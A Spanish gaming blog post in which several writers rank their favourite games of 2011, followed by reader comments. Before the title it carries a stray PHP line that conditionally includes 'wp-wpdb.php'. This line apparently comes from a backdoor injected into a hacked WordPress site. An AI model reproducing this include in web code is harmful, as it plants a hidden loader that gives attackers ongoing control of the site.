if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Los GOTY 2011 de los piratas – La Fortaleza de LeChuck

Los GOTY 2011 de los piratas

2011 será recordado por un año cargado de juegazos para todos los gustos y plataformas, pero sobretodo por remakes y nuevas entregas de sagas clásicas. Quizá no sois capaces de recordar todos los títulos aparecidos, por eso os dejo este link para que hagáis memoria.

Como cada año, no puede faltar la gala de entrega de premios de los VGA, los GOTY elegidos por el público, que tiene lugar este sábado, pero nosotros pasamos de estas ceremonias y cada piratón ha elaborado la lista de sus juegos del año, entre todos los que ha jugado en 2011. Si os preguntáis porque no salen algunos es por esta razón, o porque no nos llaman la atención, aunque si lo haga para el resto de la humanidad.

Mucha variedad para todos los públicos, pasen y vean!.

ELAINE

1. Monkey Island – Edición Especial.
Sin duda estas dos aventuras gráficas marcaron un antes y un después en mi vida gamer, y posiblemente sean de los mejores juegos jamás creados. A pesar de habérmelos pasado muchas veces, nunca me canso. Como siempre digo, un remake me parece una oportunidad única para que los jóvenes experimenten las mismas sensaciones que vivimos los que jugamos hace más de 20 años. No puede ocupar otro puesto que el primero para mí. Imprescindibles.

2. Halo Combat Envolved Anniversary
Seguimos con los remakes, pero no un remake cualquiera. Por el 10 aniversario de Halo1 se creó esta edición conmemorativa con gráficos y sonido en HD, donde las aventuras del Jefe maestro y Cortana contra el Convenant lucían mejor que nunca. Halo1 es un shooter diferente, con una historia sólida que merece ser jugado por todo tipo de gamers.
>Ver análisis

3. Mario Kart 7
Seguro que me estoy ganando el odio de muchos con esta lista, y más de uno está poniendo el grito en el cielo, pero ¿Qué queréis que os diga? Mario Kart 7 es un juego atemporal, donde en cada título la diversión y los piques están asegurados. Da igual lo bien que se te den los juegos de conducción, aquí vas a recibir leches por doquier. Las mejoras introducidas en esta nueva entrega, como lo de las comunidades, es algo que esperábamos desde hace mucho tiempo. Solo por este título ya queda cubierta mi inversión de la 3DS.

4. Skyrim
El juego del año para muchos, con puntuaciones de 10 en diferentes medios, aunque a mí me parece una exageración. Es un juego excelente, sobretodo por el mundo abierto y los gráficos impresionantes, pero con grandes carencias y bugs a mansalva. Es inexplicable lo de los movimientos torpes y antinaturales de los personajes, y la creación de objetos sin que se vea reflejado en pantalla. No sé, me da la sensación por ese tipo de cosas que estoy jugando a un juego de una generación anterior, pero como ya he dicho, vale mucho la pena por las historias y la jugabilidad.
>Ver análisis

5. L.A. Noire
Se merece una mención especial este juego. Por los gráficos y movimientos reales que me impactaron en su día, lo incluyo en la lista. También a destacar la ambientación y buena historia aunque con limitaciones y muy lineal. Si hubiera tenido un poco más de GTA quizá hubiera triunfado más y el estudio no se hubiera ido al carajo.
>Ver análisis

GUYBRUSH

1. Zelda Skyward Sword
No solo por lo que representa, si no porque es un juego de verdad, un juego con detalles, un juego de la vieja escuela. Los juegos no se hacen en 1 año ni en 2, los juegos se hacen hasta que se terminen en toda su idea y posibilidades, y este Zelda representa lo que cada uno de la saga ha intentado, sin prisas ni rellenos, copar las horas de muchos viciados que no buscan la dificultad en que te maten de un golpe, si no en unos puzzles realmente pensados para hacerte dar vueltas a la cabeza buscando el siguiente paso. Volver a utilizar lo mejor de cada uno de sus predecesores le ha ayudado mucho, y todavía tienen margen de mejora para el próximo.
>Ver análisis

2. Battlefield 3
La versión más redonda de Battlefield, renovado con un nuevo modo monojugador atractivo y ligero (CoD Style) y su gigantesco multijugador de siempre, con algunos nuevos modos, nuevos vehículos, nuevas armas y sobretodo su motor Frostbite que pone patas arriba nuestras máquinas y la generación en cuánto a lo que hace más real un videojuego, la luz y las físicas.
>Ver análisis

3. Xenoblade
Xenoblade llegó a Europa con todos pensando en The Last Story y Zelda, en un verano que prometía ser más largo que el desierto de Gerudo, como un Oasis apareció en el calendario de lanzamientos de Nintendo como un auténtico «salvaWiis». No nos confundamos, a veces la peor agua nos sabe bien ante la sed, no es, esta vez, el caso. Xenoblade logró cautivarnos con su combinación de JRPG y RPG occidental, a lo largo de 60 grandes horas de una gran historia y unos combates muy dinámicos.
>Ver análisis

4. Portal 2
Portal 2 llegó con un díficil papel, aportar algo más que en su primera parte. En mi opinión, no solo lo hizo, si no que se redondeó y sin dejarnos llevar por el hype desmesurado, se hizo un juego excelente. El «puzzle» del año.
>Ver análisis





OTIS


1. Zelda Skyward Sword
He de reconocer que no he probado ni Skyrim, ni Portal 2, ni Uncharted 3, ni Gears of War 3, ni Batman Arkham City, pero seguramente, aunque lo hubiera hecho, mi seleccionado para el GOTY de este año seguiría siendo The Legend of Zelda: Skyward Sword, y tengo mis razones.
No solo por haberse convertido instantáneamente en uno de los mejores The Legend of Zelda de toda la saga y en todo un clásico imprescindible, sino por todo lo que un Zelda conlleva. La magia envuelve cada rincón de la aventura, la profundidad de los personajes, una banda sonora maravillosa y una mecánica de juego brillante, todo ello hace de Skyward Sword, a mí parecer, uno de los mejores juegos de los últimos tiempos.
>Ver análisis

2. The Legend of Zelda: Ocarina of Time 3D
He de decir que si Skyward Sword es uno de los mejores juegos de toda la saga The Legend of Zelda, Ocarina of Time es, para mí, el mejor juego, no solo de toda la saga, de toda la historia. Para todos los fans de Zelda este ha sido un año increíble, Nintendo nos ha brindado la oportunidad de celebrar el 25 aniversario de la mejor de las maneras, haciendo un remake del «GOTY de los GOTY». Si no hubieran sacado Skyward Sword sin duda este sería mi GOTY de este año.
>Ver análisis

3. ICO & Shadow of the Colossus
En mí humilde opinión, ICO y Shadow of the Colossus son otros de los mejores juegos de la historia y este año hemos podido disfrutar de los dos grandes títulos del Team ICO en un solo disco. Pese a ser una versión remasterizada, las sensaciones provocadas al jugar a estas dos maravillosas aventuras se mantienen intactas y no pierden un ápice de lo que quiso plasmar en ellas Fumito Ueda. Dos imprescindibles, si aún no los tenéis, ¡id a por ellos insensatos!

4. El Profesor Layton y la llamada del espectro
Soy un fan incondicional de la saga del Profesor Layton y la verdad es que Level 5 no me ha defraudado nunca. El Profesor Layton y la llamada del espectro sigue en la misma línea que sus antecesores y pese a tener puzzles con una mecánica similar, el encanto del primer juego sigue presente. Cuando probé el Profesor Layton y la villa misteriosa me supo a poco, lo terminé demasiado pronto, pero creo han conseguido crear unas historias extraordinarias.

5. Ghost Trick: Detective Fantasma
Ghost Trick salió a la venta a principios de este año y me pareció un juego muy entretenido y original, algo que se agradece en los tiempos que corren. De lo mejor que hemos podido probar en DS este año. Ahora quizás pase algo desapercibido pero en un futuro seguro que será considerado una obra maestra.
>Ver análisis

SMIRK

1. Portal 2
Simplemente porque se sale de los GOTY tradicionales, nunca un juego había sido tan entretenido y adictivo sin recurrir a las formulas comercionales del mundo gamer. Imaginaros la felicidad de los que han conseguido completar sus dos ediciones cuando oígan que el Portal 2 ha sido juego del año. Un juego en el que tu única arma es el intelecto y que explota el razonamiento lógico debería de estar en el TOP.
>Ver análisis

2. Skyrim
Sin palabras. Dentro de la gama de los RPG nunca había podido disfrutar de tanta libertad combinado con unos escenarios y personajes sublimes. Un juego tan largo y con tanta dosis de exploración debería de ser GOTY además de la sensación que da ver como vas creando tu personaje poco a poco y va creciendo en las habilidades que tu crees más convenientes. Una pasada…
>Ver análisis

3. Battlefield 3
Como no, nombrar como GOTY personal al shooter que más me ha cautivado. Un despliegue técnico increíble y un online vertiginoso. Nunca antes se habían enfrentado 24 usuarios online en una batalla que se desarrolla en unos gigantescos escenarios y que necesita de una gran dosis de coordinación además de mucha cabeza para lograr el éxito.
>Ver análisis

LARGO LAGRANDE

1. Mortal kombat
Apesar de que esta saga nunca me llamara la atención lo suficiente, ésta entrega en concreto es un BUEN juego de lucha por la cantidad inmensa de extras que tiene, su duración a pesar de ser un juego de este tipo, su doblaje, su facilidad para hacerte con el control aunque no seas un maestro de kung fu, los movimientos nuevos que trae respecto a los anteriores y sobre todo, su espectacularidad: es especialmente entretenido ver un combate por los movimientos y lo impresionante que es el conjunto en si.

2. Portal 2 
Un FPS sin muertes y basado en la lógica normalmente tiene poco atractivo excepto cuando se trata de Portal. La combinación de puzzles, mezclada con la historia, su ambientación, música, el carisma de los personajes y el humor, hacen de este juego uno de los mas grandes de la historia de los videojuegos. A parte de concluir de una de las formas mas impresionantes que he visto.
>Ver análisis

3. Dead space 2 
Desde hace tiempo el género del survival horror ha estado de capa caída; pero éste juego vuelve a lograr que nos asustemos como cuando éramos niños y que tengamos miedo hasta de caminar por un pasillo oscuro. Un juego que recupera la esencia de un género hasta el punto en el que puedes correr y no lo haces por miedo, se merece una mención especial. Por otra parte la historia es muy buena, como la banda sonora, el doblaje y el nivel de detalle del mundo.

4. Infamous 2
Anteriormente mencionado en un articulo, este juego en resumen lo considero tan bueno por la sensación de poder en un sandbox, el bestial guión, con escenas de vídeo tipo cómic tan buenas como si las hubiera diseñado el mismísimo Stan Lee y un mundo que merece ser explorado para poder concluir con el sublime final que tiene.
>Ver análisis

5. Battlefield 3
No es fácil hablar de un juego al que consideran el mejor FPS de todos los tiempos. Estamos de acuerdo de que no es un simulador, pero aún así el nivel de realismo es tan y tan bueno, la destrucción del entorno está tan bien lograda y que cada recoveco y detalle esté tan bien definido que hacen de este juego posiblemente y con razón para muchos gente, el mejor FPS de la historia.
>Ver análisis

CARA LIMÓN

1. Batman: Arkham City
Si ya el primero me pareció el mejor de su año. Esta segunda parte me parece sublime. Acción, enigmas, situaciones que resolver y un cuidado guion hacen que se vea en pantalla a un superheroe de verdad.






2. Super Mario 3D Land
Al final va a ser 3DS, la portátil tan atacada este año, la que va a colar varios juegos en mi lista de los mejores. La nueva aventura de Mario viene cargada de sus principales características y en unas estupendas tres dimensiones, que no solo lo decoran, si no que en muchas ocasiones son imprescindibles.
>Ver análisis

3. Mario Kart 7
Es fácil describir un juego como este. Adicción pura y dura. Uno de los reyes del multijugador, ¿quien no se lo pasa bien jugando a Mario Kart? La pequeña china del zapato de este juego no es culpa suya, si no del sistema elegido por Nintendo. Jugar a Mario Kart online con un chat de voz ya sería impresionante.

4. The Legend of Zelda: Skyward Sword
Impresionante aventura para cerrar, casi, la vida de Wii. Un nuevo Zelda épico que llega a tutear al mismisimo Ocarina of Time.
>Ver análisis

5. L.A. Noire
Por muchos denostado, por otros muchos alabado. Rockstar demuestra en esta magnífica aventura sus grandes artes para las obras maestras. ¿Es lento? No, es casi perfecto.
>Ver análisis

6. The Legend of Zelda: Ocarina of Time 3D
Meter un remake de un juego de tiempos pasados como mejor juego del año es complicado. Estamos hablando de un juego que ya tuvo su oportunidad de demostrar su valía. Y bien que lo hizo, ya que hablar de Ocarina of Time es hablar del mejor, la versión estrenada en 3DS demuestra que el juego no queda desfasado, se adapta a cualquier momento, además lo acompaña una traducción al español y unas grandes tres dimensiones.
>Ver análisis

7. Uncharted 3
La última aventura de Drake no defrauda, es enorme. Aprovecha al máximo lo que nos queda de esta generación. Quizá no sorprenda como la segunda parte, pero es mejor y está muy bien contada.

8. Rage
Los padres de los FPS retornan con una mezcla de generos insolita y asombrosa. Como coger un shooter en primera persona y añadirle una pizca de sandbox y alguna que otra carrerita y convertirlo en algo fresco y original. Lástima que esas texturas bailantes estropeen algo el resultado.
>Ver análisis

HERMAN

1. Gears of War 3
Sin duda alguno creo que es el juego del año, es, presumiblemente, el fin de una saga y el final de una de las mejores historias que han pasado por Xbox. Han mejorado los gráficos, el vocabulario sigue siendo dionisíaco, y la sangre está presente durante todo el juego. Además las muchísimas novedades del modo multijugador, la mejora en los servidores y la inclusión del modo bestia hacen que todo lo que le faltaba a la segunda entrega esté completado en esta. Además, es un Gears, y sobran las palabras.

2. NBA 2k12
Personalmente creo que es mejor simulador deportivo que ha existido jamás. El motor gráfico es espectacular, no falta ni un detalle en el juego. La mecánica de tiro es perfecta, y los movimientos bajo aros son los mejores que se han desarrollado hasta el momento. Además contamos todos los jugadores actuales junto a todas las estrellas veteranas que podíamos desear. Si te gusta el básquet y el deporte, no puede perdértelo.

3. The Legend of Zelda Skyward Sword
La última entrega de nuestro amigo Link es sin duda una de las mejores. La incorporación del Wii Motion Plus hace que nuestro movimiento sean algo más precisos, o mejor dicho, que no tengamos que repetir un movimiento mil veces para que salga bien. Si no has probado nunca un Zelda sin duda alguna este te enganchará desde el primer momento.
>Ver análisis




4. Skyrim
La continuación de Oblivion se merece el cuarto lugar por su perfecta ambientación y una mejor caracterización de los personajes. Horas, horas, horas y más horas de diversión creo que bastan para que este título esté entre los mejores del año. No hay que olvidar que el juego guarda mil y una sorpresas esperando a que la descubramos , y no podemos permitirnos perdernos ni una.
>Ver análisis

5. Assassins Creed Revelations
Una obra maestra que parece ser el ocaso de la vida de Ezio. Quizás no esté en un puesto más alto debido a que es ya la cuarta entrega, y hace que el efecto sorpresa de otras entregas anteriores desaparezca en esta. Aun así tiene muchas novedades que nos harán gozar nuevamente de la hermandad. Este título es el fin de una historia que se juega con la Gears ser la mejor trama de los últimos tiempos.


6. Kirby’s Return to Dreamland
Creo que es la sorpresa del año, y es que Nintendo se ha vuelto a superar con la creación de la última entrega de la bolita rosa. Un juego que sin utilizar los grandes reclamos de los videojuegos (sangre, violencia, tiros, etc.) ha conseguido cautivar a los más pequeños y a los más grandes. Creo que este juego va a vender mucho más de lo que a priori se piensa.
>Ver análisis

WALLY

1. Uncharted 3
Mi top personal, mi GOTY del año con mayúsculas, se lo lleva la última entrega de la franquicia Uncharted. Me queda la duda de qué hubiera pasado de haber jugado al resto de juegos “gordos” de este año que no he tenido aún la ocasión, es decir Skyward Sword, GoW3, MW3, Battlefield 3, Dark Souls, Zumba Fitness y otros. Probablemente alguno se hubiera colado en la lista y me da la sensación que especialmente la última entrega de las andanzas de Link. Pero aún así lo tendría muy difícil para alcanzar el primer puesto que creo con toda justicia se merecen Nathan Drake y sus compinches. Uncharted 2 ya era un juego de 10 y la premisa principal no ha cambiado nada, en todo caso todo es “más”. Más espectacular (aunque parezca mentira), más poderío gráfico (aunque parezca mentira –bis-), más peliculero… Este juego de por sí justifica y da razón de ser a su consola. Sus personajes, a pesar de ser los arquetipos más manidos en historias de cazatesoros sin embargo tienen un carisma brutal, y a pesar de sus bravuconadas no podemos evitar encariñarnos con Drake y maldecir a la vez que él cuando nos enfrentamos a situaciones tan absurdamente contrarias como cinemáticas. Una delicia de juego, vaya. El broche para llegar al número uno y que me ha despejado las dudas es precisamente el cuidado que le han puesto al mayor debe que sufría la segunda entrega: su multijugador. Tengo que decir que es de los más divertidos que he jugado y tanto el cooperativo, con fantásticas misiones al estilo de la campaña, como el competitivo, que es realmente variado y adictivo, elevan a los altares este título, y hace que nos olvidemos que la campaña te la fundes en solo unas 10 intensas, pero breves horas… Si Uncharted 2 era de 10, Uncharted 3 es un 12, y por ello se lleva mi GOTY.

2. Batman: Arkham City
Se dijo que Arkham Asylum era el mejor juego de la historia sobre superhéroes. Estaba de acuerdo… hasta que llegó su secuela. Y es que manteniendo la esencia del primero ahora de repente pasamos a tener mucha más libertad y mucho más terreno que cubrir, planear, callejear y arrastrarnos siendo Batman. Arkham City no lo voy a descubrir a nadie, como buena secuela es más largo y más grande que su predecesor, y además se ha pulido aún más el más que correcto sistema de combate y otros detalles que flojeaban en la primera entrega, hasta alcanzar prácticamente la excelencia. El género de Arkham City no es los sandbox, ni los plataformas, ni los Action-RPG. Es un simulador. El simulador perfecto de ser el Caballero Oscuro.

3. Portal 2
Portal 2 es el soplo de aire fresco. Un juego que demuestra que se puede figurar en una lista de los más exitosos del año sin tener que masacrar a cientos de alienígenas y encima ser sumamente inteligente y divertido. Es gratificante, tanto solo como en compañía, ya que a diferencia de la primera parte esta vez Valve nos regala uno de los mejores multijugadores cooperativos jamás vistos. Jamás unas máquinas tuvieron tanto carisma. Una gozada, imprescindible.
>Ver análisis

4. The Elder Scrolls V: Skyrim
Para muchos Skyrim es el juego del año, yo opino que es un gran juego que salió un poco antes de tiempo y que tiene muchas cosas por pulir, como el AC: Revelations. Probablemente en estos momentos hordas enloquecidas de fanboys se dirigen a mi puerta ya, antorchas en mano, sin embargo los numerosos parches que han ido saliendo al poco de su lanzamiento acreditan un poco esta sensación. No obstante para mí es el gran juego de rol del año sin lugar a dudas, nos hace olvidarnos un poco de esa decepción llamada DA2, y nos ofrece un mundo extenso en el que perdernos durante horas, y horas, y horas… Y las cosas claras: si está en la lista de goty es porque hay que jugarlo, sí o sí.
>Ver análisis

5. Ghost Trick: Detective Fantasma
Para empezar mi lista de mejores juegos del año, uno de los juegos “sorpresa” y que desde luego me ha hecho disfrutar más pegado a mi pequeña DS. Ghost Trick es un juego diferente, especial, muy inteligente. Una pequeña joya que no debe pasar desapercibida para nadie que tenga la portátil de Nintendo. Es de esos juegos que no olvidas con el tiempo y que tras pasarlo te dejan una sensación de completa satisfacción. Sobretodo es una gran historia, contada de forma impecable y que apelará a nuestro ingenio para poder desentrañarla. Imaginaos que podéis rebobinar a 4 minutos de la muerte de alguien para evitarla. Imaginaos esta posibilidad dentro de un argumento creado por los responsables de la saga Phoenix Wright. Imaginaos la Banda Sonora por los mismos de los Ace Attorney. Efectivamente: Obra maestra.
>Ver análisis

STAN

1. Gears of War 3
Ya sea por su cálidad gráfica que exprime al máximo las capacidades de una XBox 360. Por su historia, la cual pone un broche más que digno a la trilogía con algún momento lacrimógeno en el que demuestran que hasta estos hombretones también tienen su corazoncito. Y por su nuevo modo Horda, que alarga la vida del juego hasta cotas insospechadas. Por todo esto y por todo lo que me queda por descubrir y disfrutar creo que GoW 3 es mi GOTY del 2011.

2. L.A. Noire
La ópera prima del Team Bondy con su mezla de sandbox y aventura gráfica, ambientación soberbia que nos traslada a la ciudad de Los Angeles de los años 50 y por su original e increíble caracterización de los personajes se merece, en mi opinión, este segundo lugar, ya que por culpa de su lentitud a la hora de desarrollar su jugabilidad y la falta de más misiones secundarias hacen que no ocupe el primer lugar, pero aún y con todo la producción de Rockstar se merece estar estar entre los 3 mejores juegos de este 2011.
>Ver análisis

3. Battlefield 3
Diseñado para ser el «Call of Duty killer» de este año, ésta nueva entrega de la saga creada por Dice nos trae todo lo que un shooter de ésta generación debe tener. Gráficos de infarto, sonido increíble y un modo online que aún incluyendo vehículos y hasta 24 jugadores en consola se mantiene estable como una roca. Por todo esto y aunque su modo historia no sea para tirar cohetes Battlefield 3 debe estar en tu estantería por ser uno de los 3 mejores juegos del 2011.
>Ver análisis

Hasta aquí nuestros favoritos al GOTY 2011, y ahora os toca a vosotros. ¿Cuales son vuestros GOTY 2011?

Publicada el
Categorizado como Opinión

Por LeChuck

Desde las profundidades del Caribe vigilo los mares.

7 comentarios

  1. Que dificil!!.. de los que he jugado y que hayan salido este año..
    Me lo he pasado genial con bastantes este año, portal 2, bf3

    pero.. creo que solo hay un ganador en mi lista.. el Alice Madness Returns

    Un enorme plataformas con toquecitos de rpg y accion endiablada como el bayonetta y slash similares.
    La ambientacion, diseño, es simplemente brutal, la historia,

  2. 1- Persona 2 (PSP)
    2- Catherine (PS3)
    3- Persona 3 Portable (PSP)
    4- Tactics Ogre (PSP)
    Esos de los que he jugado. De haberlos jugado, Kirby, Zelda y Ghost Trick también estarían en la lista, así como Portal 2 y The Binding of Isaac.
    Todos japos, pero bueh… Soy así xD

  3. Muy buena elección, si bien habéis comentado el poco reconocido Ghost Trick, os habéis dejado otro juego que la gente está dejando pasar de largo Alice Madness Returns.

    Por otro lado me cuesta creer que a alguien pueda gustarle la reedición del Monkey Island, tiene un aspecto gráfico hiriente, insultante y Guybrush parece un chungo de barrio con un tsunami en la frente. Respetar el

  4. Para mi, el GOTY del año es Uncharted 3 La Traición De Drake porque ha mejorado bastante desde el 2 con los gráficos, las texturas de todos los lugares, y hasta el online que es para mi en lo único que flojea un poco.
    Muy buena web piratillas 🙂

Dejar un comentario